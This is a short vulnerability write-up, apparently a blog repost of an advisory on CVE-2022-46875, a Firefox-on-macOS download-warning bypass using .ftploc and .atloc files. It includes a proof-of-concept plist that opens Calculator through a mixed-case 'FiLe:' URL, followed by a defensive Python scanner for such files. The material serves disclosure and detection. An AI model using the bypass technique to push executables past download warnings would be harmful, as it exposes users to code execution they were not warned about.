
[0-Day] CVE-2022-46875 - Mozilla Firefox Download Protection Bypass Vulnerability

by l33d0hyun 2023. 1. 15.

Mozilla Firefox

Original Write up : SSD ADVISORY – MACOS MOZILLA FIREFOX DOWNLOAD PROTECTIONS WERE BYPASSED

Summary

  • Mozilla Firefox does not show the executable file warning when downloading .atloc and .ftploc files, which can run commands on a user’s computer.

Credit

CVE

  • CVE-2022-46875

Vendor Response

Technical Analysis

  • A vulnerability in the way Mozilla Firefox handles certain file extensions allows attackers to bypass the warning given for dangerous files and make them seem harmless.
  • The protection triggers on .inetloc but fails to do the same for .ftploc and .atloc, two extensions that on macOS are equivalent to executables.

PoC

  • poc.ftploc
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
    <plist version="1.0">
    <dict>
    <key>URL</key>
    <string>FiLe:////////////////////////System/Applications/Calculator.app</string>
    </dict>
    </plist>
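
The following added example (not part of the original write-up or of Firefox's code) triages downloaded location files from the defender's side: it parses the plist and reports whether the URL key points at a local file: target, comparing the scheme case-insensitively as the PoC's `FiLe:` spelling requires. The function names, verdict strings and both sample plists are constructed for illustration.

```python
import plistlib
from pathlib import Path
from urllib.parse import urlsplit

# Extensions this page names as macOS internet-location files.
LOCATION_EXTS = {".inetloc", ".ftploc", ".atloc"}

# Constructed samples: one shaped like the page's PoC, one ordinary FTP location.
POC_LIKE = plistlib.dumps({"URL": "FiLe:////////////////////////System/Applications/Calculator.app"})
BENIGN = plistlib.dumps({"URL": "ftp://ftp.example.org/pub/"})


def classify(name: str, data: bytes) -> str:
    """Verdict for one file: not-location-file, unparseable, local-target or remote-target."""
    if Path(name).suffix.lower() not in LOCATION_EXTS:
        return "not-location-file"
    try:
        url = plistlib.loads(data)["URL"]
        if not isinstance(url, str):
            raise TypeError("URL key is not a string")
        # urlsplit lowercases the scheme, so "FiLe:" and "file:" compare equal.
        scheme = urlsplit(url.strip()).scheme
    except Exception:
        return "unparseable"  # not a plist dict with a string URL: review by hand
    return "local-target" if scheme == "file" else "remote-target"


def scan(folder: str) -> list[tuple[str, str]]:
    """Return (filename, verdict) for every location file under folder that needs review."""
    hits = []
    for path in sorted(Path(folder).rglob("*")):
        if path.is_file() and path.suffix.lower() in LOCATION_EXTS:
            verdict = classify(path.name, path.read_bytes())
            if verdict != "remote-target":
                hits.append((path.name, verdict))
    return hits


if __name__ == "__main__":
    for label, blob in (("poc.ftploc", POC_LIKE), ("mirror.atloc", BENIGN)):
        print(label, classify(label, blob))
```

`scan` can be pointed at a downloads folder; files whose URL uses a remote scheme are not reported, only local-target and unparseable ones.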

Demo
